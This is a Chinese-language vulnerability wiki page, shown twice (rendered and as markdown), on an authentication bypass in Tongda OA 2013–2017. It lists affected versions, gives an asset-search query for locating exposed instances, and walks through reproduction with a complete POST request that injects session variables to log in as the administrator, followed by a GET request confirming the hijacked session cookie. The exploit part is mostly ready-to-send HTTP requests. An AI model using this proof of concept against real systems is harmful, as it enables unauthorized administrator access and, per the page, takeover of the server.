fofamini-wiki

登录白背景

源码

通达OA身份认证绕过漏洞

一、漏洞简介

通达OA（Office Anywhere网络智能办公系统）是中国通达公司的一套协同办公自动化软件。通达OA 2013-通达OA2017存在一个认证绕过漏洞，利用该漏洞可以实现任意用户登录。攻击者可以通过构造恶意攻击代码，成功登录系统管理员账户，继而在系统后台上传恶意文件控制网站服务器。

二、影响版本

通达OA2013、通达OA2016、通达OA2017

三、资产测绘

hunter：app.name="通达 OA"

登录页面

四、漏洞复现

访问/module/retrieve_pwd/header.inc.php,响应为200表示可能存在漏洞

通过POC获取cookie

POST /module/retrieve_pwd/header.inc.php HTTP/1.1
Host: xx.xx.xx.xx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: no-cache
Content-Length: 1834
Content-Type: application/x-www-form-urlencoded
Pragma: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36

_SESSION[LOGIN_THEME]=15&_SESSION[LOGIN_USER_ID]=1&_SESSION[LOGIN_UID]=1&_SESSION[LOGIN_FUNC_STR]=1,3,42,643,644,634,4,147,148,7,8,9,10,16,11,130,5,131,132,256,229,182,183,194,637,134,37,135,136,226,253,254,255,536,24,196,105,119,80,96,97,98,114,126,179,607,539,251,127,238,128,85,86,87,88,89,137,138,222,90,91,92,152,93,94,95,118,237,108,109,110,112,51,53,54,153,217,150,239,240,218,219,43,17,18,19,15,36,70,76,77,115,116,185,235,535,59,133,64,257,2,74,12,68,66,67,13,14,40,41,44,75,27,60,61,481,482,483,484,485,486,487,488,489,490,491,492,120,494,495,496,497,498,499,500,501,502,503,505,504,26,506,507,508,515,537,122,123,124,628,125,630,631,632,633,55,514,509,29,28,129,510,511,224,39,512,513,252,230,231,232,629,233,234,461,462,463,464,465,466,467,468,469,470,471,472,473,474,475,200,202,201,203,204,205,206,207,208,209,65,187,186,188,189,190,191,606,192,193,221,550,551,73,62,63,34,532,548,640,641,642,549,601,600,602,603,604,46,21,22,227,56,30,31,33,32,605,57,609,103,146,107,197,228,58,538,151,6,534,69,71,72,223,639,

验证是否成功获取到cookie

GET /general/ HTTP/1.1
Host: xx.xx.xx.xx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: no-cache
Pragma: no-cache
Upgrade-Insecure-Requests: 1
Cookie: PHPSESSID=n6kr9cao2oc9lcpbn8jonhphg4; path=/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36

原文: https://www.yuque.com/xiaokp7/ocvun2/pgh3g4aasnfhvtzs

# 通达OA身份认证绕过漏洞

# 一、漏洞简介
通达OA（Office Anywhere网络智能办公系统）是中国通达公司的一套协同办公自动化软件。通达OA 2013-通达OA2017存在一个认证绕过漏洞，利用该漏洞可以实现任意用户登录。攻击者可以通过构造恶意攻击代码，成功登录系统管理员账户，继而在系统后台上传恶意文件控制网站服务器。

# 二、影响版本

- 通达OA2013、通达OA2016、通达OA2017

# 三、资产测绘

- hunter：`app.name="通达 OA"`

![image.png](./img/3L_nVaVajhxGHi_w/1692003460335-993393b7-6356-4e6d-b55c-8d1d61492f8a-220201.png)

- 登录页面

![image.png](./img/3L_nVaVajhxGHi_w/1692003485971-9050a76c-feac-4831-8ab4-cae1098ba778-907227.png)

# 四、漏洞复现

1. 访问`/module/retrieve_pwd/header.inc.php`,响应为`200`表示可能存在漏洞

![image.png](./img/3L_nVaVajhxGHi_w/1692004743396-532d29e2-da25-470d-873f-427db57d16fd-174916.png)

2. 通过POC获取cookie
```
POST /module/retrieve_pwd/header.inc.php HTTP/1.1
Host: xx.xx.xx.xx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: no-cache
Content-Length: 1834
Content-Type: application/x-www-form-urlencoded
Pragma: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36

_SESSION[LOGIN_THEME]=15&_SESSION[LOGIN_USER_ID]=1&_SESSION[LOGIN_UID]=1&_SESSION[LOGIN_FUNC_STR]=1,3,42,643,644,634,4,147,148,7,8,9,10,16,11,130,5,131,132,256,229,182,183,194,637,134,37,135,136,226,253,254,255,536,24,196,105,119,80,96,97,98,114,126,179,607,539,251,127,238,128,85,86,87,88,89,137,138,222,90,91,92,152,93,94,95,118,237,108,109,110,112,51,53,54,153,217,150,239,240,218,219,43,17,18,19,15,36,70,76,77,115,116,185,235,535,59,133,64,257,2,74,12,68,66,67,13,14,40,41,44,75,27,60,61,481,482,483,484,485,486,487,488,489,490,491,492,120,494,495,496,497,498,499,500,501,502,503,505,504,26,506,507,508,515,537,122,123,124,628,125,630,631,632,633,55,514,509,29,28,129,510,511,224,39,512,513,252,230,231,232,629,233,234,461,462,463,464,465,466,467,468,469,470,471,472,473,474,475,200,202,201,203,204,205,206,207,208,209,65,187,186,188,189,190,191,606,192,193,221,550,551,73,62,63,34,532,548,640,641,642,549,601,600,602,603,604,46,21,22,227,56,30,31,33,32,605,57,609,103,146,107,197,228,58,538,151,6,534,69,71,72,223,639,
```
![image.png](./img/3L_nVaVajhxGHi_w/1692004810841-08054097-eb33-4d7c-bb59-70db83801857-650573.png)

3. 验证是否成功获取到cookie
```
GET /general/ HTTP/1.1
Host: xx.xx.xx.xx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: no-cache
Pragma: no-cache
Upgrade-Insecure-Requests: 1
Cookie: PHPSESSID=n6kr9cao2oc9lcpbn8jonhphg4; path=/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
```
![image.png](./img/3L_nVaVajhxGHi_w/1692014179800-d2653517-12f9-4ee2-8a0f-fddeffe71bf0-049653.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/pgh3g4aasnfhvtzs>